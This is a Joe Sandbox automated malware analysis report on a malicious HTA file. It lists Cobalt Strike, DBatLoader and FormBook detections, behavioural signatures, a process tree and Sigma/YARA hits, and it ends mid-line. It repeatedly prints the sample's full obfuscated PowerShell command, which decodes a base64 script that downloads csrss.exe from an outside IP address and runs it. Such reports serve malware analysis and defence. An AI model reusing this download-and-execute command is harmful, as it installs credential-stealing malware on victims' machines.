Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fgd.hta

Overview

General Information

Sample name:fgd.hta
Analysis ID:1664904
MD5:f7bb185c10824ee3f3706749b37e969b
SHA1:844dd7341ee1c10964702470013e6910cdeda945
SHA256:cac32941d0d9176a10b105459e893c126b3617318f4f2c6a67501d7b313df8f3
Tags:192-3-26-143htauser-skocherhan
Infos:

Detection

Cobalt Strike, DBatLoader, FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Detected Cobalt Strike Beacon
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected FormBook
Yara detected Powershell decode and execute
Allocates many large memory junks
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Drops PE files with benign system names
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
PowerShell case anomaly found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Parents
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Unusual Parent Process For Cmd.EXE
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • mshta.exe (PID: 3372 cmdline: mshta.exe "C:\Users\user\Desktop\fgd.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 4480 cmdline: "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2424 cmdline: POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 7232 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 7248 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F1A.tmp" "c:\Users\user\AppData\Local\Temp\z0uhqkog\CSCA33479D5CCDF488DBD48FF689C9305B.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • csrss.exe (PID: 7676 cmdline: "C:\Users\user\AppData\Roaming\csrss.exe" MD5: 848EBACD95EAD54CDCFE5D916093D2C8)
          • cmd.exe (PID: 7728 cmdline: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7591.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7776 cmdline: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\37991.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • PING.EXE (PID: 7848 cmdline: ping 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • iaoqralA.pif (PID: 7840 cmdline: C:\\Users\\user\\Links\iaoqralA.pif MD5: C116D3604CEAFE7057D77FF27552C215)
            • 4nHrKBXqqqVJFZFp.exe (PID: 5660 cmdline: "C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\wgDVT7rL.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
              • systeminfo.exe (PID: 8116 cmdline: "C:\Windows\SysWOW64\systeminfo.exe" MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
                • 4nHrKBXqqqVJFZFp.exe (PID: 2620 cmdline: "C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\7rPkWXE1JEx.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
                • firefox.exe (PID: 7240 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • svchost.exe (PID: 6920 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000016.00000002.3629881400.0000000005360000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000015.00000002.3625364823.0000000002400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000015.00000002.3627870487.0000000004070000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000015.00000002.3627956403.00000000040C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000011.00000002.1583072891.0000000035BE0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            17.2.iaoqralA.pif.400000.1.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              12.2.csrss.exe.3800000.3.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                12.2.csrss.exe.2856178.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                  12.2.csrss.exe.2856178.0.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                    17.2.iaoqralA.pif.400000.1.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                      SourceRuleDescriptionAuthorStrings
                      amsi32_2424.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                        System Summary

                        barindex
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\csrss.exe, ProcessId: 7676, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2424, TargetFilename: C:\Users\user\AppData\Roaming\csrss.exe
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGF
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7591.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7591.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ParentImage: C:\Users\user\AppData\Roaming\csrss.exe, ParentProcessId: 7676, ParentProcessName: csrss.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7591.cmd, ProcessId: 7728, ProcessName: cmd.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\csrss.exe, NewProcessName: C:\Users\user\AppData\Roaming\csrss.exe, OriginalFileName: C:\Users\user\AppData\Roaming\csrss.exe, ParentCommandLine: POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2424, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ProcessId: 7676, ProcessName: csrss.exe
                        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\csrss.exe, ProcessId: 7676, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2424, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline", ProcessId: 7232, ProcessName: csc.exe
                        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\\Users\\user\\Links\iaoqralA.pif, CommandLine: C:\\Users\\user\\Links\iaoqralA.pif, CommandLine|base64offset|contains: , Image: C:\Users\user\Links\iaoqralA.pif, NewProcessName: C:\Users\user\Links\iaoqralA.pif, OriginalFileName: C:\Users\user\Links\iaoqralA.pif, ParentCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ParentImage: C:\Users\user\AppData\Roaming\csrss.exe, ParentProcessId: 7676, ParentProcessName: csrss.exe, ProcessCommandLine: C:\\Users\\user\\Links\iaoqralA.pif, ProcessId: 7840, ProcessName: iaoqralA.pif
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2424, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csrss[1].exe
                        Source: Process startedAuthor: Tim Rauch: Data: Command: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7591.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7591.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ParentImage: C:\Users\user\AppData\Roaming\csrss.exe, ParentProcessId: 7676, ParentProcessName: csrss.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7591.cmd, ProcessId: 7728, ProcessName: cmd.exe
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2424, TargetFilename: C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]